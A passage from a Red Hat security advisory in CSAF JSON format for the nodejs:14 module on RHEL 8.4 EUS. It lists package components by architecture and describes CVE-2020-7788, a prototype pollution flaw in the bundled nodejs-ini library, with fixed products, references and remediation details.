"nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "product": { "name": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "product_id": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "product": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "product_id": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@14.18.2-2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64", "product": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64", "product_id": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.15-1.14.18.2.2.module%2Bel8.4.0%2B13643%2B6c0ebf22?arch=x86_64\u0026epoch=1" } } } ], "category": "architecture", "name": "x86_64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, "product_reference": "nodejs:14:8040020211213111158:522a0ee4", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64 as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64" }, "product_reference": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le" }, "product_reference": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x" }, "product_reference": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src" }, "product_reference": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64 as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64" }, "product_reference": "nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64 as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64" }, "product_reference": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le" }, "product_reference": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x" }, "product_reference": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64 as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64" }, "product_reference": "nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64 as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64" }, "product_reference": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le" }, "product_reference": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x" }, "product_reference": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64 as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64" }, "product_reference": "nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64 as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64" }, "product_reference": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le" }, "product_reference": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x" }, "product_reference": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64 as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64" }, "product_reference": "nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch" }, "product_reference": "nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64 as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64" }, "product_reference": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le" }, "product_reference": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x" }, "product_reference": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64 as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64" }, "product_reference": "nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch" }, "product_reference": "nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src" }, "product_reference": "nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch" }, "product_reference": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src" }, "product_reference": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64 as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64" }, "product_reference": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le" }, "product_reference": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x" }, "product_reference": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64 as a component of nodejs:14:8040020211213111158:522a0ee4 as a component of Red Hat Enterprise Linux AppStream EUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" }, "product_reference": "npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4" } ] }, "vulnerabilities": [ { "cve": "CVE-2020-7788", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-12-11T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1907444" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ini. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ini: Prototype pollution via malicious INI file", "title": "Vulnerability summary" }, { "category": "other", "text": "Node.JS packages in Red Hat Enterprise Linux and Red Hat Software Collections included the vulnerable dependency packaged in \"nodejs-npm\" component. Processing malicious files using npm could potentially trigger this vulnerability. The \"ini\" package bundled with npm was not in the library path where it could be included directly in other programs.\n\nThe nodejs-nodemon packages in Red Hat Enterprise Linux and Red Hat Software Collections are affected by this vulnerability as they bundle the nodejs-ini library. Usage of that library is governed by nodemon itself, so applications started by nodemon are not impacted. Further, nodemon is a developer tool not intended to be used in production.\n\nThe ini package is included in Red Hat Quay by protractor and webpack-cli, both of which are dev dependencies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7788" }, { "category": "external", "summary": "RHBZ#1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7788", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7788" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" } ], "release_date": "2020-12-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-25T09:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", 